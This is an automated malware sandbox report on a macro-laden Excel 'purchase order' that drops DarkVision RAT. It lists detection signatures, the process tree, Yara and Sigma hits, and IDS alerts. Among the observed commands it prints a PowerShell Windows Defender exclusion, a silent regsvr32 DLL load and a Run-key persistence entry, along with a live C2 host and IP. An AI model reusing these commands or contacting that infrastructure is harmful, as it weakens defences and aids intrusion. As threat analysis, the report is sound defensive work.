
Windows Analysis Report
PO202503D.xlsm

Overview

General Information

Sample name: PO202503D.xlsm
Analysis ID: 1635002
MD5: 7928d4da38767e17b693dc1c3b12376b
SHA1: b357c6211bbf9b463553d5137aac957fbd9b0868
SHA256: 525dca66603ba93785836da140e8bf75d86a71ce828d30797171a3989e1dee51
Tags: xlsm, user-cocaman

Detection

DarkVision Rat
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected landing page (webpage, office document or email)
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7512 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • 7z.exe (PID: 2028 cmdline: "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • regsvr32.exe (PID: 2524 cmdline: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • PO202502DAKE.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)
      • conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5680 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • aspnet_wp.exe (PID: 7640 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
  • cmd.exe (PID: 8344 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO202502DAKE.exe (PID: 8408 cmdline: "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)
      • conhost.exe (PID: 8416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_wp.exe (PID: 8476 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
  • cmd.exe (PID: 8528 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO202502DAKE.exe (PID: 8572 cmdline: "C:\Users\user\SystemRootDoc\PO202502DAKE.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)
      • conhost.exe (PID: 8588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_wp.exe (PID: 8636 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" MD5: 10072393B2116AF4483194F101923CA4)
  • cleanup
{"C2": "myasyncrat.ddns.net", "Port": 3369}
Source | Rule | Description | Author | Strings
C:\Users\user\SystemRootDoc\nasrallah_x86.dll | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security |
C:\Users\user\SystemRootDoc\nasrallah_x86.dll | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security |
C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |

Source | Rule | Description | Author | Strings
0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security |
0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x39748:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x39678:$s1: CoGetObject
  • 0x39710:$s2: Elevation:Administrator!new:
0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security |
0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
(34 further entries not shown)

Source | Rule | Description | Author | Strings
33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security |
33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x38748:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x38678:$s1: CoGetObject
  • 0x38710:$s2: Elevation:Administrator!new:
16.2.aspnet_wp.exe.140000000.0.raw.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security |
16.2.aspnet_wp.exe.140000000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
(31 further entries not shown)

                          System Summary

Source: File created | Author: frack113, Florian Roth | Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7512, TargetFilename: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentProcessId: 7440, ParentProcessName: PO202502DAKE.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5680, ProcessName: powershell.exe
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7512, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ProcessId: 7440, ProcessName: PO202502DAKE.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7512, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", ProcessId: 2524, ProcessName: regsvr32.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: cmd.exe /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ProcessId: 7440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PO202502DAKE
Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 149.137.128.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49722
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentProcessId: 7440, ParentProcessName: PO202502DAKE.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5680, ProcessName: powershell.exe
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49722, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 149.137.128.16, SourceIsIpv6: false, SourcePort: 443
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe, ParentProcessId: 7440, ParentProcessName: PO202502DAKE.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5680, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7512, TargetFilename: C:\Users\user\Desktop\~$PO202503D.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T09:14:04.982077+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 13.107.246.60 | 443 | TCP
2025-03-11T09:14:11.705861+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 13.107.246.60 | 443 | TCP
2025-03-11T09:14:11.738304+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 13.107.246.60 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T09:13:13.157509+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:13:14.685727+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:13:15.482849+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:13:16.271074+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:13:17.107375+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:13:17.897749+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:14:19.144733+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:14:20.693296+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:14:21.485023+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:14:22.285681+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:14:23.105771+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:14:23.892180+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:15:25.435564+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:15:26.980852+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:15:27.769902+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:15:28.584015+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:15:29.371709+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:15:30.165707+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:16:31.200880+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:16:32.721864+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:16:33.519209+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:16:34.343812+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:16:35.128035+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:16:35.911570+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:17:37.560776+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:17:39.114159+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:17:39.937782+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:17:40.721046+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:17:41.528004+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:17:43.330003+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:18:43.385047+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:18:44.892855+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:18:45.674723+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:18:46.457340+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:18:47.241808+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:18:48.060076+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:19:50.001318+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:19:51.530639+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:19:52.340237+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49773 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:19:53.151154+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49774 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:19:53.932851+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49775 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:19:54.749781+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49776 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:20:55.826171+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:20:57.345135+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49778 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:20:58.146867+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49779 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:20:58.925765+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49780 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:20:59.732838+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:21:00.509814+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49782 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:22:01.667975+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49783 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:22:03.169886+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49784 | 84.38.129.34 | 3369 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T09:13:14.241305+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:14:20.257458+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:15:26.529772+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:16:32.289929+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:17:38.661675+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:18:44.462572+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:19:51.095957+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:20:56.888841+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 84.38.129.34 | 3369 | TCP
2025-03-11T09:22:02.742842+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49783 | 84.38.129.34 | 3369 | TCP


                          AV Detection

Source: PO202503D.xlsm | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dll | Avira: detection malicious, Label: TR/AVI.Agent.bzhgo
Source: C:\Users\user\SystemRootDoc\msvcp290.dll | Avira: detection malicious, Label: TR/AVI.Agent.bzhgo
Source: 0000000C.00000002.1315965400.000002333C8D5000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: DarkVision Rat {"C2": "myasyncrat.ddns.net", "Port": 3369}
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dll | ReversingLabs: Detection: 21%
Source: C:\Users\user\SystemRootDoc\msvcp290.dll | ReversingLabs: Detection: 21%
Source: PO202503D.xlsm | Virustotal: Detection: 19%

                          Exploits

Source: Yara match | File source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1316214716.00000273D3000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1537027703.0000021BC506A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.1452878031.000001FF21000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1315965400.000002333C86A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1537278105.0000025C5A000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1537027703.0000021BC5000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.1452878031.000001FF2106A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1315965400.000002333C800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.1453587554.0000023FB6000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO202502DAKE.exe PID: 7440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aspnet_wp.exe PID: 7640, type: MEMORYSTR
